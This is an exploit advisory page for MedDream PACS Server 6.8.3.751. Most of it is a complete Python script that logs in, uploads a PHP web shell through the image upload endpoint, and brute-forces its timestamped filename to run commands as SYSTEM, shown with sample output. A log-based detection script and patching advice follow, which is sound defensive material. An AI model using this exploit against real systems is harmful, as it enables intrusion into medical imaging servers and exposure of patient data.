MedDream PACS Server 6.8.3.751 Remote Code Execution

2020.10.03
Credit: bzyo
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python
#
# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 2020-10-01
# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
# Vendor Homepage: https://www.softneta.com
# Version: 6.8.3.751
# Tested On: Windows 2016
#
# Timeline
# 05-02-20: Submitted incident through email, immediate response
# 05-04-20: Issue resolved, new version released 6.8.3.1.751
#
# Note: Core vulnerability resides in another product which has been remediated as well
#
# ##PoC##
#
# 1. create one line php shell to call commands
# 2. run script on attacking machine
# 3. enter parameters: IP, filename, username, password, command
#
# root@kali:~# python meddream.py
# Enter IP Address: 192.168.0.223
# Enter payload filename + .php: cmd.php
# Enter Username: user1
# Enter Password: SoSecure!!
# Enter command: whoami
# 212357
# <pre>nt authority\system
# </pre>
# http://192.168.0.223/Pacs/upload/20201001-212357--cmd.php?cmd=whoami
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
#

# Python 2 script (raw_input / print statement); unused imports dropped
from bs4 import BeautifulSoup
import requests
from datetime import datetime, timedelta

ip_addr = raw_input("Enter IP Address: ")
user_file = raw_input("Enter payload filename + .php: ")
uname = raw_input("Enter Username: ")
pword = raw_input("Enter Password: ")
cmd = raw_input("Enter command: ")

URL1 = 'http://' + ip_addr + '/Pacs/login.php'         # login form (anti-spam token, AE title)
URL2 = 'http://' + ip_addr + '/Pacs/authenticate.php'  # credential submission
URL3 = 'http://' + ip_addr + '/Pacs/uploadImage.php'   # image upload handler


def main():
    session = requests.Session()

    # Scrape the hidden form fields needed for a valid login
    site = session.get(URL1)
    soup = BeautifulSoup(site.content, "html.parser")
    antispam = soup.find("input", {"name": "formAntiSpam"})["value"]
    dbname = soup.find("input", {"name": "aetitle"})["value"]

    login_data = {
        'loginvalue': 'login',
        'aetitle': dbname,
        'username': uname,
        'password': pword,
        'formAntispam': antispam,
        'login': 'Login',
    }
    r = session.post(URL2, data=login_data)

    # Upload the .php file through the image "Attach" action
    files = [
        ('actionvalue', (None, 'Attach', None)),
        ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
        ('action', (None, 'Attach', None)),
    ]
    r = session.post(URL3, files=files)

    # Stored file is named <YYYYMMDD>-<HHMMSS>--<filename>; the server-side
    # timestamp is unknown, so try a window of seconds around the local time
    today = datetime.today()
    upload_date = today.strftime("%Y%m%d")
    less = 1
    now1 = datetime.now()
    up_time1 = now1.strftime("%H%M%S")
    print(up_time1)

    # varying time checks +/-
    now2 = now1 - timedelta(seconds=less)
    up_time2 = now2.strftime("%H%M%S")
    now3 = now2 - timedelta(seconds=less)
    up_time3 = now3.strftime("%H%M%S")
    now4 = now3 - timedelta(seconds=less)
    up_time4 = now4.strftime("%H%M%S")
    now5 = now4 - timedelta(seconds=less)
    up_time5 = now5.strftime("%H%M%S")
    now6 = now5 - timedelta(seconds=less)
    up_time6 = now6.strftime("%H%M%S")
    now7 = now6 - timedelta(seconds=less)
    up_time7 = now7.strftime("%H%M%S")
    now8 = now1 + timedelta(seconds=less)
    up_time8 = now8.strftime("%H%M%S")
    now9 = now8 + timedelta(seconds=less)
    up_time9 = now9.strftime("%H%M%S")    # fixed: original formatted now8 here
    now10 = now9 + timedelta(seconds=less)
    up_time10 = now10.strftime("%H%M%S")  # fixed: original formatted now9 here

    up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5,
                     up_time6, up_time7, up_time8, up_time9, up_time10]

    for i in up_time_array:
        r = session.get('http://' + ip_addr + '/Pacs/upload/' + upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
        if r.status_code == 200:
            print r.content
            print r.url
        else:
            print ("404")


if __name__ == '__main__':
    main()
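From the defender's side, the exploit leaves a recognisable trace in the web server access log: a POST to /Pacs/uploadImage.php followed by GETs for a script-extension file under /Pacs/upload/ named in the date-time--filename scheme (a burst of 404s from the timestamp guessing, then a 200 once the name matches). The following detector is an added example, not part of the advisory or the vendor's software; the log lines are constructed Apache-combined-style samples and the path patterns are taken from the advisory above.

```python
import re

# Constructed sample access-log lines (not from the advisory): one client runs the
# upload-then-fetch sequence, another uploads a legitimate DICOM file.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2020:21:23:50 +0000] "POST /Pacs/authenticate.php HTTP/1.1" 302 0
10.0.0.5 - - [01/Oct/2020:21:23:57 +0000] "POST /Pacs/uploadImage.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Oct/2020:21:23:58 +0000] "GET /Pacs/upload/20201001-212356--cmd.php?cmd=whoami HTTP/1.1" 404 0
10.0.0.5 - - [01/Oct/2020:21:23:58 +0000] "GET /Pacs/upload/20201001-212357--cmd.php?cmd=whoami HTTP/1.1" 200 43
10.0.0.9 - - [01/Oct/2020:21:30:01 +0000] "POST /Pacs/uploadImage.php HTTP/1.1" 200 512
10.0.0.9 - - [01/Oct/2020:21:30:05 +0000] "GET /Pacs/upload/20201001-213001--scan.dcm HTTP/1.1" 200 8812
"""

# Apache combined-format request line: client, timestamp, method, path, status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Script-extension file served from the upload directory in the
# <YYYYMMDD>-<HHMMSS>--<name> scheme described in the advisory
UPLOAD_EXEC_RE = re.compile(
    r'^/Pacs/upload/\d{8}-\d{6}--[^/?]+\.(php\d?|phtml|phar)(\?|$)', re.IGNORECASE)


def parse_line(line):
    """Return the request fields of one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text):
    """One alert per GET of a script file under /Pacs/upload/.
    status 200 = the script was served (executed); anything else = probing of
    the naming scheme. after_upload marks clients seen POSTing to uploadImage.php."""
    uploaded = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        if rec["method"] == "POST" and rec["path"].startswith("/Pacs/uploadImage.php"):
            uploaded.add(rec["ip"])
        elif rec["method"] == "GET" and UPLOAD_EXEC_RE.match(rec["path"]):
            alerts.append({"ip": rec["ip"], "ts": rec["ts"],
                           "path": rec["path"].split("?")[0], "status": rec["status"],
                           "severity": "executed" if rec["status"] == "200" else "probe",
                           "after_upload": rec["ip"] in uploaded})
    return alerts
```

A server-side fix for the same weakness is to reject non-DICOM uploads by content, store them outside the web root under a random name, and deny script execution in the upload directory; the detector above is useful while patching to 6.8.3.1.751 or later is pending.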


Copyright 2024, cxsecurity.com